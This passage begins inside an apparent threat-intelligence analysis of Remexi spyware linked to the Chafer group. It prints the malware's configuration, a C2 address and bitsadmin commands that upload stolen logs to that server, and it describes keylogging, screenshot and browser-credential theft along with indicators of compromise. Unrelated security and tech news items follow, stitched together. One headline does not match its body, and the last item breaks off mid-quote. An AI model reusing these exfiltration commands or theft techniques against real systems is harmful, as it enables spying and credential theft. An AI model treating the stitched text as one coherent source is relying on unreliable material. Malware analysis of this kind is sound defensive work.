CaptureSites VPN*0,0
Login*0,0
mail*0,0
Security*0,0
Window titles of interest for screenshots, using left mouse button and Enter keypress hook
important upLog.txt
upSCRLog.txt
upSpecial.txt
upFile.txt
upMSLog.txt
List of files to send to C2 using bitsadmin.exe from the dedicated thread
maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2
Servers http://108.61.189.174 Control server HTTP URL
ZipPass KtJvOXulgibfiHk Password for uploaded zip archives
browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread

Most of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut are worth describing in more detail as their programming logic is not so intuitive.

One of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments the integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global variable. After that, it checks if the iterator divided by (captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.

Main module (events.exe)

SHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31
MD5 c981273c32b581de824e1fd66a19a281
Compiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler
Type I386 Windows GUI EXE
Size 68 608

After checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility expand.exe with the following arguments:

expand.exe -r \"<full path to HCK.cab>\" -f:* \"<event_cache_dir_path>\\\"

Then it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads:

ID Thread description
1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility
2 Decrypts command from registry using RC4 with a hardcoded key, and executes it
3 Transfers screenshots from the clipboard to \Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)
4 Transfers screenshots to \Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies
5 Checks network connection, encrypts and sends gathered logs
6 Unhooks mouse and keyboard, removes bitsadmin task
7 Checks if malware’s working directory size already exceeds its threshold
8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads

The malware uses the following command to receive data from its C2:

bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal <server> <file>
http://<server_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>

Activity logging module (Splitter.exe)

This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc.

SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff
MD5 1ff40e79d673461cd33bd8b68f8bb5b8
Compiled 2017.08.06 11:32:36 (GMT), 2.22
Type I386 Windows Console EXE
Size 101 888

Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters:

Parameter Description
-scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)
-ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration. Specifies the screen coordinates to take
-zip Name of password (from configuration data) protected zip archive
-clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration

Data exfiltration

Exfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2:

bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal "<control_server>/YP01_<victim_fingerprint>_<log_file_name>" "<log_file_name>"

Victims

The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of these appear to be foreign diplomatic entities based in the country.

Attribution

The Remexi malware has been associated with an APT actor called Chafer by Symantec.

One of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word “health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing the Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes two Iranians called Mohammad Reza, although this could be a common name or even a false flag.

Conclusions

Activity of the Chafer APT group has been observed since at least 2015, but based on things like compilation timestamps and C&C registration, it’s possible they have been active for even longer. Traditionally, Chafer has been focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.

We will continue to monitor how this set of activity develops in the future.

Indicators of compromise

File hashes

events.exe
028515d12e9d59d272a2538045d1f636
03055149340b7a1fd218006c98b30482
25469ddaeff0dd3edb0f39bbe1dcdc46
41b2339950d50cf678c0e5b34e68f537
4bf178f778255b6e72a317c2eb8f4103
7d1efce9c06a310627f47e7d70543aaf
9f313e8ef91ac899a27575bc5af64051
aa6246dc04e9089e366cc57a447fc3a4
c981273c32b581de824e1fd66a19a281
dcb0ea3a540205ad11f32b67030c1e5a

splitter.exe
c6721344af76403e9a7d816502dca1c8
d3a2b41b1cd953d254c0fc88071e5027
1FF40E79D673461CD33BD8B68F8BB5B8
ecae141bb068131108c1cd826c82d88b
12477223678e4a41020e66faebd3dd95
460211f1c19f8b213ffaafcdda2a7295
53e035273164f24c200262d61fa374ca

Domains and IPs

108.61.189.174

Hardcoded mutexes

Local\TEMPDAHCE01
Local\zaapr
Local\reezaaprLog
Local\{Temp-00-aa-123-mr-bbb}

Scheduled task

CacheTask_<user_name_here>

Directory with malicious modules

Main malware directory: %APPDATA%\Microsoft\Event Cache
Commands from C2 in subdirectory: Cache001\cde00.acf

Events.exe persistence records in Windows system registry keys

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Activity Manager

Victims’ fingerprints stored in

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData or
HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PidRegData

RC4 encrypted C2 commands stored in

HKCU\SOFTWARE\Microsoft\Fax

HTTP requests template

http://<server_ip_from_config>/asp.asp?ui=<host_name>nrg-<adapter_info>-<user_name>
And bitsadmin.exe task to external network resources, addressed by IP addresses



Securelist

2019 and Beyond: The (Expanded) RSAC Advisory Board Weighs in on What’s Next: Pt. 2

Part two of RSA’s Conference Advisory Board look into the future tackles how approaches to cybersecurity must evolve to meet new emerging challenges.

Microsoft acquires Citus Data, re-affirming its commitment to Open Source and accelerating Azure PostgreSQL performance and scale

Data and analytics are increasingly at the center of digital transformation, with the most leading-edge enterprises leveraging data to drive customer acquisition and satisfaction, long-term strategic planning, and expansion into net new markets. This digital revolution is placing an incredible demand on technology solutions to be more open, flexible, and scalable to meet the demands of large data volumes, sub-second response times, and analytics driven business insights.

Microsoft is committed to building an open platform that is flexible and provides customers with technology choice to suit their unique needs. Microsoft Azure Data Services are a great example of a place where we have continuously invested in offering choice and flexibility with our fully managed community based open source relational database services, spanning MySQL, PostgreSQL and MariaDB. This builds on our other open source investments in SQL Server on Linux, a multi-model NoSQL database with Azure Cosmos DB, and support for open source analytics with the Spark and Hadoop ecosystems. With our acquisition of GitHub, we continue to expand on our commitment to empower developers to achieve more at every stage of the development lifecycle.

Building on these investments, I am thrilled to announce that we have acquired Citus Data, a leader in the PostgreSQL community. Citus is an innovative open source extension to PostgreSQL that transforms PostgreSQL into a distributed database, dramatically increasing performance and scale for application developers. Because Citus is an extension to open source PostgreSQL, it gives enterprises the performance advantages of a horizontally scalable database while staying current with all the latest innovations in PostgreSQL. Citus is available as a fully-managed database as a service, as enterprise software, and as a free open source download.

Since the launch of Microsoft’s fully managed community-based database service for PostgreSQL in March 2018, its adoption has surged. Earlier this month, PostgreSQL was named DBMS of the Year by DB-Engines, for the second year in a row. The acquisition of Citus Data builds on Azure’s open source commitment and enables us to provide the massive scalability and performance our customers demand as their workloads grow.

Together, Microsoft and Citus Data will further unlock the power of data, enabling customers to scale complex multi-tenant SaaS applications and accelerate the time to insight with real-time analytics over billions of rows, all with the familiar PostgreSQL tools developers know and love.

I am incredibly excited to welcome the high-caliber Citus Data team to Microsoft! Working together, we will accelerate the delivery of key, enterprise-ready features from Azure to PostgreSQL and enable critical PostgreSQL workloads to run on Azure with confidence. We continue to be energized by building on our promise around Azure as the most comprehensive cloud to run open source and proprietary workloads at any scale and look forward to working with the PostgreSQL community to accelerate innovation to customers.

For more information on Citus Data, you can read the blog post from Umur Cubukcu, CEO and co-founder, here.

The post Microsoft acquires Citus Data, re-affirming its commitment to Open Source and accelerating Azure PostgreSQL performance and scale appeared first on The Official Microsoft Blog.

Threat Spotlight: IoT Application Vulnerabilities Leave IOT Devices Open To Attack.

IoT devices were popular gifts again this holiday season. An acronym for Internet of Things, IoT is more than a buzzword. The trend represents a huge shift in how products are made and used, as network connectivity is added to products that were not previously intended to have this functionality. So, your refrigerator that sends you a text message when you’re out of milk: IoT. Your thermostat that provides usage graphs on your phone: yep, IoT. Basically, any consumer device capable of connecting to a network other than a computer, phone, tablet, or router is considered an IoT device.

Security has been a big concern with IoT devices, though. Although improvements have been made, new types of vulnerabilities remain. For example, the Barracuda Labs teams recently used an IoT security camera to help illustrate a new threat: IoT credential compromise, which uses web and mobile application vulnerabilities to compromise IoT devices.

IoT securityHighlighted Threat:

IoT credential compromise — Attackers can use vulnerabilities in the web applications and mobile applications used by certain IoT devices to acquire credentials, which can then be used to view the video feed, set/receive/delete alarms, remove saved video clips from cloud storage, and read account information. Attackers can also use the credentials to push their own firmware update to the device, changing its functionality and using the compromised device to attack other devices on the same network.
The Details:

To illustrate this threat, the Barracuda Labs team recently conducted research on a connected security camera and identified multiple vulnerabilities in the camera’s web app and mobile app ecosystem:

Mobile app ignores server certificate validity
Cross-site scripting (XSS) in the web app
File traversal in a cloud server
User controls device update link
Device updates are not signed
Device ignores server certificate validity

Using these vulnerabilities, the team was able to perform the following attacks to acquire credentials and compromise an IoT device, all without a direct connection to the device itself.

Acquiring credentials from the mobile app

If an attacker can intercept traffic to the mobile app by using a compromised or hostile network, they can easily acquire the user password. Here’s how it works:

The victim connects to a compromised/hostile network with a mobile phone.
The connected camera app will try to connect to the vendor’s servers over https.
The hostile/compromised network will route the connection to the attacker’s server, which will use its own SSL certificate and proxy the communication to the
vendor’s server.
The attacker’s server now holds an unsalted, MD5 hash of the user password.
The attacker can also tamper the communication between the vendor’s server and the app.

Acquiring credentials from the web app

This type of attack relies on functionality that allows users to share device access to the connected camera with other users. To share a device, the receiver needs to have a valid account with the IoT vendor, and the sender needs to know the receiver’s username, which happens to be an email address.

The attacker will embed an XSS exploit in a device name and then share that device with the victim.
Once the victim logs into his account using the web app, the XSS exploit will execute and share the access token (which is stored as a variable on the web app)
with the attacker.
With that access token, the attacker can access the victim’s account and all its registered devices.

Through this research, the Barracuda Labs team managed to compromise an IoT device (connected camera) without any direct connection to the device itself. This makes life easier for attackers. No more scanning on Shodan for vulnerable devices. Instead, the attack will be performed against the vendor’s infrastructure. It’s a threat that could affect other types of IoT devices as well, regardless of their function, because it takes advantage of the way the device communicates with the cloud.

After all, bugs are not inherent to products, rather to processes, skills, and awareness of the developers. As access and access controls for IoT devices shifted to cloud services, so did the vulnerabilities, making possible the types of attacks uncovered by the Barracuda Labs team.

Lessons for IoT manufacturers

Vendors creating IoT solutions need to protect all aspects of the applications used to run those devices. IoT devices are sensors distributed in homes, schools, and offices, and they’re potential entry points for attackers. Each customer’s network is an opening to the server core and to other customers.

A web application firewall, one of the most critical protections IoT vendors need to put in place, is designed to protect servers from HTTP traffic at layer 7. Manufacturers also need to ramp up protection against network layer attacks and phishing.

Cloud security is also important, providing visibility, protection, and remediation of IoT applications and the infrastructures they run on. The potential for lateral-movement exposure is large and complex, so taking proper security precautions is key.

How to protect yourself as a consumer

When buying an IoT device, consumers need to think about security, in addition to convenience and, price. Here are a few tips to consider:

Research the device manufacturer — A few companies that produce IoT devices understand software security. Most are either existing companies whose expertise lies in making the physical products that are being connected or startups trying to bring devices to market as quickly as possible. In both cases, proper software and network security measures are often overlooked.
Look for existing vulnerabilities in a vendor’s other devices — If one device has a vulnerability, it’s likely other devices with similar features from the same company are also vulnerable. Ultimately, a vendor that has a history of secure devices will likely build secure devices going forward.
Evaluate responses to past vulnerabilities — If a vendor is responsive to people reporting a vulnerability and quickly resolves it with firmware update, it bodes well for their outlook on security and future products they make.

Unfortunately, the amount of information available about the security posture of IoT devices is astonishingly low. Ideally, we need to get a world where IoT products are all scored with a safety rating, just like cars. Consumers should be informed before they invest in IoT devices.

The post Threat Spotlight: IoT Application Vulnerabilities Leave IOT Devices Open To Attack. appeared first on IT Security Guru.

HGH Infrared Systems’ Unprecedented Showcase Of SPYNEL Thermal Imager At Africa’s Biggest Security And Defence Exhibition.

Intersec Dubai, 20 – 22 January 2019, Dubai International Convention & Exhibition Centre, Hall S1, Booth K34. MOBOTIX is exhibiting for the 12th time at intersec Dubai 2019. They are showcasing their solutions to this worldwide event which has shown a continuous growing and evolving trend over the past years.

Along with the latest product releases and new innovations such as MOBOTIX NAS, MOBOTIX MOVE Range, the next generation video management software MOBOTIX Management Center (MxMC) 2.0, MOBOTIX is providing a deeper look into solutions applicable to all industries and needs that include:

• Facial Recognition • A.I. • Biometric Solutions • Remote Power • Surveillance Tower Fuel Cell Integrations • Solar/Power Plant monitoring and analysis • Storage

Together with their Technology and Solution Partners, MOBOTIX is demonstrating this array of new solutions at the show. The MOBOTIX solution for any application shows the versatility and flexibility of the products being offered.

“We’re always excited to be exhibiting at intersec Dubai, 12 years now. The UAE is a hub of technology innovation” says Phillip Antoniou, Vice President Sales Europe South/West & MEA, “We are looking forward to showing the true Cyber Security features of our solutions and the open flexibility we can utilize with our partners which bring new meaning to being an open solution focused company.”

The supplementary range MOBOTIX MOVE cameras along with the premium video systems for the Mx6 technology platform, plus the new MOBOTIX NAS devices and MxMC 2.0. With MxMC 2.0, it is now possible to combine a unique, compatible hybrid solution not only the intelligent decentralized MOBOTIX IoT cameras but also the MOBOTIX MOVE cameras and third-party ONVIF S-cameras plus the new MOBOTIX NAS devices.

An exclusive feature of the NAS devices from MOBOTIX is that they are pre-installed with the MxMC interface software, which facilitates centralized access to all camera recordings via an MxMC client. This applies to the decentralized MOBOTIX IoT cameras as well as to the MOBOTIX MOVE series and/or those supplied by third parties.

About MOBOTIX All over the world sites are protected by using MOBOTIX IP video technology. It delivers absolute reliability even in the most challenging conditions. From Oil Rigs in the North Sea, to World Heritage Sites in remote deserts, whether it is helping scientists at an Arctic research centre or greeting climbers at the top of Mount Everest; MOBOTIX equipment is designed for durability to provide the best overall return on investment. An extended operating lifetime is guaranteed and further enhanced by continual software upgrades

The post HGH Infrared Systems’ Unprecedented Showcase Of SPYNEL Thermal Imager At Africa’s Biggest Security And Defence Exhibition. appeared first on IT Security Guru.

Plexal Bolsters Global Cybersecurity Hub With Two International Partnerships.

Innovation centre Plexal, which delivers LORCA, the government-backed cybersecurity programme, today announces partnerships with the Global Cyber Alliance, City of New York, and the New York Economic Development Corporation. The partnerships are designed to help cybersecurity companies scale internationally while also expanding Plexal’s role as a major global cybersecurity cluster.

Plexal is announcing that the Global Cyber Alliance (GCA) has become a supporting partner, meaning that Plexal members and members of the LORCA cohort will benefit from access to the alliance’s global partners (of which there are over 200), such as Bank of America, IBM, KPMG, Microsoft and Sony. As well as mentoring and networking opportunities, the GCA will bring a wealth of cybersecurity expertise from government and the private sector to share with cyber innovators in Plexal’s network to help them shape their products into viable solutions that solve real-world challenges.

Plexal is also announcing its partnership with the City of New York Mayor’s Office of the Chief Technology Officer and the New York Economic Development Corporation. This will see Plexal be the UK lead for the NYCx Cybersecurity Moonshot Challenge, with a focus on creating better cybersecurity solutions for SMEs. Plexal will both ensure UK innovators are well represented as challenge participants and also act as the primary UK landing pad for challenge winners. Plexal will provide consultation, demo opportunities and a base for winners to develop in the UK through free coworking space and support at Plexal’s hub at Here East, London. The partnership will establish strong connections between cyber innovators based in NYC and the UK, enabling sharing of knowledge and resources that is vital to solving cybersecurity challenges on a global scale.

Global cooperation at LORCA
These partnerships build on the launch of the London Office for Rapid Cybersecurity Advancement (LORCA) in June 2018, hosted and delivered by Plexal with £13.5m of funding from the Department for Digital, Culture, Media & Sport (DCMS). As the UK’s dedicated space for industry-led cybersecurity innovation, LORCA supports the most promising cybersecurity innovators in scaling and growing solutions to meet the most pressing industry challenges. In terms of its international remit, LORCA’s Industry Advisory Board includes representation from Cyber Spark (the Israeli cyber hub) and the National University of Singapore, among others. LORCA also works closely with the Department for International Trade and the Foreign and Commonwealth Office to connect LORCA members to international networks through delegations and trade missions.

Andrew Roughan, Managing Director of LORCA, says: “Sharing knowledge and being open to cooperation between global cyber innovators and industry is more important than ever. We’re looking forward to deepening our links with new global partners and acting as the UK landing pad and connector. These important partnerships with the New York Development Corporation and the Global Cyber Alliance will mean the emerging cyber stars we support can have even greater direct access to new markets and the networks they need to succeed.”

Andy Bates, GCA Executive Director for UK and EMEA, Global Cyber Alliance, says: “Innovation and entrepreneurship are key to shoring up cyber defences. GCA is pleased to partner with Plexal and LORCA and participate in their program to work with scaleups working on cybersecurity challenges.”

James Patchett, President and CEO at the New York City Economic Development Corporation, says: “Cybersecurity is one of our world’s greatest threats, and we need to be ambitious about protecting ourselves. That’s why we’re making New York City a hotbed for cyber innovation, to protect every New Yorker and every business – all while creating good-paying jobs. We’re proud to help launch this important challenge, which will benefit New York City and create game-changing technology for the world to share.”

The post Plexal Bolsters Global Cybersecurity Hub With Two International Partnerships. appeared first on IT Security Guru.

SolutionsPT To Host Cryptomining Webinar For OT Professionals.

Industrial IT software provider SolutionsPT will host a free webinar exploring the evolving cyber security threat posed by Cryptomining infections and how they can be prevented, on Thursday, February 21st.

Designed for Operational Technology (OT) professionals, the Introduction to Cryptomining webinar will examine the specific threat Cryptomining poses to OT environments and discuss the solutions that will enable organisations to guard against it.

Cryptomining is a malware threat that affects Industrial Control Systems (ICS), enabling hackers to use an infected PC’s resources to mine for digital currency. The webinar will explore how, if left unchecked, the infections can disrupt OT environments, causing hardware failure, massively increasing energy consumption and preventing systems from carrying out mission-critical tasks.

Unlike other malware attacks, Cryptomining attacks can also be extremely difficult to detect, even after a system has become infected, making them especially dangerous.

Chris Whitehead, Managed Platform Product Manager at SolutionsPT, said: “There has been a significant increase in the number of cyber security attacks against Industrial Control Systems in recent years, with Cryptomining attacks emerging as the top malware threat of 2018. It’s vital that OT professionals are aware of the dangers they pose and our webinar will provide them with a great amount of usable information to take away.

“Our experts will also use the webinar to discuss various solutions to the problems posed by Cryptomining, from increasing the visibility of their industrial networks to ensuring they have both pre-emptive and reactive solutions in place.”

The 30-minute webinar begins at 11am. Attendance is free but attendees must register in advance here: https://solutionspt.com/events_webinars/live-webinar-the-evolving-cyber-security-threat-introduction-to-cryptomining/

The post SolutionsPT To Host Cryptomining Webinar For OT Professionals. appeared first on IT Security Guru.

Five Top Tips For Small Businesses Adopting Encryption.

Written by Bernard Parsons, CEO, Becrypt

Becrypt has been in the disk encryption business for more than 15 years and have carried out extensive work with governments and large enterprises. Today, a lot of what we’re doing is working with small businesses, typically organisations that are looking at adding encryption for the first time, driven by regulation such as GDPR, and those that require encryption as part of the privacy enforcing mechanisms.

Based on the experience and feedback that Becrypt has attained, I have summarised the top-five issues that small businesses should think about if they are looking at adopting disk encryption, or if they’re looking at undertaking wider rollouts of disk encryption.

1. Ease of use
Organisations must look for products that are easy to use, easy and quick to install; an obvious requirement that is partly about reducing the time and expertise required to install products in the first place. But an important subsequent point is also total cost of ownership. If a product is not easy to install, it is usually a good indicator that actually there is a level of complexity that will remain as a long-term business overhead.
The more complex a product is, the more complexity there is to manage, leading to higher levels of required expertise and the more potential for support issues to occur over time, driving up the product’s total cost of ownership for the organisation.

2. Accessible support
Encryption can be a business-critical asset, as well as a business-enabling technology. It’s therefore important that you’re working with an organisation – whether that’s a vendor or the vendor’s partner – that can offer good, and accessible technical support to you.
Even if you get the first point right i.e., you’re choosing a product that’s easy to use, that’s going to reduce the amount of required technical support, you should still think about the potential for requiring support over the total life of the product. In a couple of years, you may be looking at doing something slightly differently, such as looking at encrypting new devices that may be non-standard (such as RAID Servers) and want to ensure that you can pick up a phone and talk to someone with sufficient expertise.
The option of phone-based support is important; being able to jump onto a call in a reasonable amount of time and actually talk to an expert. Therefore, we’d certainly recommend testing this process with a vendor or the partner before you go ahead and procure.

3. Proof of encryption
It’s a good first step to encrypt laptops, as organisations will always lose laptops. Encryption turns what would potentially be an information-loss, into just the loss of a physical asset, protecting the organisation’s information and addressing the organisation’s liabilities.
However, under regulation such as GDPR, there is often a requirement to prove that devices actually were encrypted in the event of a loss, in order to avoid some of the reporting requirements within these regulations. Proving that a device loss is not an information loss and avoiding the need to undertake breach notification, is something you want to be able to think about in advance. If you’re deploying a product that includes centralised management, that functionality should already be there. But many small businesses will choose to deploy in a more stand-alone configuration, without the need to stand up a central management platform.
With standalone installs, you should still ensure that that product has a reporting capability of some kind, such as online, allowing the encryption status of your estate of devices to be reported.

4. Extendibility
In the first instance, you may be looking at deploying encryption within an estate of Windows devices. But it could be the case within a year or two that you have other requirements; you might need to manage encryption on Mac devices, or on smartphones and mobile devices within that same suite of products. Therefore, it’s a good idea to look for vendors that have multi-platform offerings, helping to future-proof your technology choice. This will ensure that you’re not tied to a vendor, but at least ensuring that your existing vendor is an option as your requirements grow.

5. Best Practice
It’s a good step to encrypt devices, and be able to prove that you’ve encrypted them. However, there is an increasing regulatory requirement to demonstrate that you’ve gone through some process of ensuring that the technology you’re adopting represents best practice. For example, GDPR explicitly references ‘state-of-the-art’ technology.

To fully ensure that you’re managing liabilities, you need to evidence that you’re not just adopting technology, but that it’s appropriately ‘state-of-the-art’. Achieving this level of confidence can only be done by looking at technology that has third-party validation, normally through product assurance or product certification. This provides independent validation that the product is of an appropriate quality.

There are a variety of common certification schemes relevant for encryption products. One of these is the US standard, Federal Information Processing Standard (FIPS), which ensures that algorithms have been correctly implemented. However, organisations must be wary of adopting technology just because it has a FIPS certification. The majority of products use the same algorithms, such as Advanced Encryption Standard (AES); FIPS ensures that a third-party has validated that the vendor has correctly implemented the algorithm.

This is similar to having a locksmith check the quality of your house locks, confirming that they are of good standards. However, they are not going to mention anything about whether you frequently leave all the windows open every time you leave. FIPS will tell you that the algorithms have been implemented correctly, but vendors can, and still do, implement products inappropriately that leave vulnerabilities.

A good example of such vulnerabilities in encryption products is within Solid State Drives (SSDs). Recent research from Radboud University in The Netherlands has highlighted vulnerabilities in not just one vendor, but a whole range of vendors’ SSDs. The fundamental reason they highlight, is that actually implementing encryption well is not easy, and it is easy to make mistakes. Vendors can take shortcuts, which means that security researchers can then find resulting vulnerabilities; in this case they were able to bypass the encryption within SSDs.

Organisations are better off looking for certification schemes that are more comprehensive. One example is the Commercial Product Assurance (CPA) scheme, run by the UK National Cyber Security Centre (NCSC). CPA works alongside FIPS for validating algorithms, but it says more about the overall product quality and implementation, looking at the security architecture to make sure that it has been designed and implemented in a sensible way.

It also looks at the vendor coding and build standards, thereby reducing the risk of there being a vulnerability in the product. The risk is never fully mitigated, but it certainly goes down to a point that allows you to say that, as an organisation, you are adopting best practice.

Alongside security and liabilities, organisations also to be concerned about the cost of being caught out by products with publicised vulnerabilities. Subsequently, they also need to think about the cost of then changing to a different solution.

In summary, these are the five things that we would suggest organisations, particularly SMEs, want to think about as they adopt encryption. It’s not rocket science and most good vendors, or their partners should be able to easily walk you through these steps.

The post Five Top Tips For Small Businesses Adopting Encryption. appeared first on IT Security Guru.

Teaming up to help journalism thrive in the digital age

Three women receiving ICFJ training
ICFJ training in the field.

As part of our mission to empower every person and organization on the planet to achieve more, Microsoft recognizes not just the fundamental need for a free press, but also the fundamental need for the free press to adapt to how people seek information.

Technology has empowered citizens to find, create and share information in unprecedented ways. How can we help journalists around the world tell stories, from sports updates to watchdog investigations, in ways that promote transparency, understanding and engagement?

Today, we’re proud to announce the Microsoft Modern Journalism grant program in collaboration with the International Center for Journalists (ICFJ). Based in Washington, D.C., ICFJ has a track record of fostering news innovation, building investigative networks, running exchange programs and promoting diverse voices. Its global mission — to build the expertise and digital skills that journalists need to deliver trustworthy news essential for vibrant societies — has so far created a community 100,000-journalists strong in 180 countries.

Sharon Moshavi, ICJF’s senior vice president of new initiatives, shares their view and vision about our new partnership this way:

“We’re thrilled to partner with the Microsoft Modern Journalism Initiative to support reporting projects focused on data analysis and immersive storytelling. Through these projects, we aim to highlight innovative ways that journalists can enhance news coverage and connect more deeply with audiences.”

The grant program will operate in two phases: The first will award funding and hands-on data journalism training to two alumni of ICFJ programs. Data journalism grounds stories in fact, makes the information transparent to its audiences, and distills the essential pertinent narrative from what could otherwise be an overwhelming swamp of information. By honing the journalist’s digital skills, we’re addressing what ICFJ has defined as a “perilous” gap in newsrooms.

The second phase will award grants for funding and training journalists need to pioneer storytelling using immersive technologies like livestreaming and mixed reality. While data invites fact-based exploration on a large scale, immersive storytelling can be remarkably intimate. It is in these shared experiences where knowledge may become understanding, observation may engender empathy, and learning may translate into action.

We look forward to announcing our winners in March. In the meantime, we encourage you to see, support and join in the kind of work that ICFJ does, be it a sobering virtual tour of the largest slum in Karachi, Pakistan, the fifth most populous city in the world, or a heartening partnership of a global conglomerate and environmental and social nonprofits to safeguard water quality in Nairobi. These stories the world over remind us of the challenges that face all of us, and how much we depend on sharing stories in ways that touch us, educate us and, most importantly, inspire us to act for the best.

The post Teaming up to help journalism thrive in the digital age appeared first on The Official Microsoft Blog.

Politicised Cyber-Attacks, Mobile Roaming And Software Security: Brexit Predictions From Tech Leaders.

Following events in Westminster yesterday, senior leaders from global businesses NETSCOUT, BICS and Sonatype share their thoughts on how Brexit will impact technology, from cyber-attacks and software security challenges, to the return of mobile roaming fees.

Could Roaming Return?

“Following the rejection of the Government’s Brexit bill, and in the event of a ‘no deal’ in March, mobile tariffs in the UK would no longer be regulated by the government, and could leave operators free to re-impose surcharges for UK subscribers roaming across Europe.

“This has driven a lot of speculation about whether we’ll see unwelcome return of post-holiday ‘bill shock’. But with LTE/4G data roaming traffic in Europe surging by 600-800% after the implementation of Roam Like at Home, it would be exceptionally unwise for operators to go against such clear demand.

“In its abolition of roaming charges, the EU set a major precedent, and motivated other operators to offer competitive international tariffs. Most of us have now grown accustomed to using our mobile phones – and all of those data-intensive apps and services – when we’re abroad, to a similar degree as when we’re in the UK. In taking that away, operators risk alienating their customer base, and risk haemorrhaging subscribers to those offering more cost-efficient roaming packages.

“In the event that all UK operators decide to opt out of Roam Like at Home, we’re still unlikely to see the high tariffs that once existed. Roaming packages promote and drive subscriber loyalty, and encourage the use of all manner of mobile services and apps, helping operators to market and deliver additional services, making it in service providers’ best interests to stay competitive.

Mikaël Schachne, VP Mobility Solutions, BICS

Regulations Should Be Upheld, But Resourcing Will Pose Challenges

“The EU has been the driving force behind some of the most crucial pieces of software security legislation, from GDPR to the Directive on security of network and information systems. While Brexit could disrupt the UK’s adoption of such initiatives, given the critical importance of securing software, the government is unlikely to make any regulatory changes that would be to the country’s detriment.

“This mentality also means that collaboration between the UK and EU on cyber security will continue after the 29th of March. No government would want to risk the security of businesses and citizens, and so both the UK and the EU nations have a vested interest in working together to boost cyber security levels.

“However, with the UK experiencing a substantial cyber skills gap that’s set to increase in coming years, Brexit could make it difficult for British businesses to hire the right talent. At the moment, British companies are easily able to build multinational workforces to make up for a shortfall. If regulations change, and it becomes harder to recruit workers, the UK could start to lag behind other nations in terms of cyber security capabilities.”

Wai Man Yau, VP International, Sonatype

Brexit Could Fuel Cyber Attacks

“Recent years have seen significant political turbulence, from the rise of populist politicians to the shock Brexit vote. With political and ideological disputes representing the third greatest motivation for launching DDoS attacks, such a landscape has provided a fertile ground for attackers.

“With Brexit pending, we’re likely to see any geopolitical or ideological disputes echoed in cyber space. This could be in the form of attacks against EU institutions, the UK cabinet office, political parties or media outlets. Other geopolitical events are also likely to fuel attacks, making it critical that countries and businesses build their understanding of cyber reflections, and stay vigilant.”

Darren Anstee, CTO, NETSCOUT

The post Politicised Cyber-Attacks, Mobile Roaming And Software Security: Brexit Predictions From Tech Leaders. appeared first on IT Security Guru.

“Most Of The World’s Airports And Leading Destinations Remain Vulnerable To Criminal Or Rogue Mayhem”.

Virtually every one of the world’s commercial airports and leading destinations currently remain vulnerable to criminal abuse or ‘rogue’ operation of drone technology notwithstanding the shock wake-up call from the chaos at Gatwick Airport last month before Christmas and more recently at Heathrow, as well as last week’s exploding drone incident in Yemen.

This warning, from Robert Garbett, founder and Chief Executive of Drone Major Group, the world’s leading global drone and counter drone consultancy, is “because there remains very low awareness among the business community of the extraordinary pace at which drone technology is evolving… and this makes staying ahead of the threat posed by those who would abuse this technology challenging, for even the most competent of businesses and management teams.

“The commercial air drone market is currently still like the Wild West… exciting, and representing unprecedented economic opportunity for companies and organisations which are fast adopting this exceptional technology. However there will always be those who would flaunt laws and regulation to cause maximum disruption around the world. This particularly impacts on more vulnerable sectors such as airports, financial centres, energy facilities, stadiums and concert venues, etc., which require tailored defence strategies to protect against what is a new and real security challenge.

“The British Armed Forces have been world leaders in the use of drone technology, for both offence and defence, for many years, long before the recent adoption by the business world, and it is their techniques which are now being applied, particularly in counter drone strategies which utilise an ever evolving range of advanced technologies to detect, track, identify and defeat the threat posed by those who would abuse air drone technology for nefarious means.

“There are literally hundreds of counter drone products and manufacturers worldwide and the market is expanding on a daily basis making it extremely difficult to keep track… which is one reason why the rapid, often knee-jerk adoption of such technology in the face of media pressure, while sometimes providing a short-term fix, can often be a long term error of judgement and, in isolation of appropriate policies and procedures, is rarely effective.

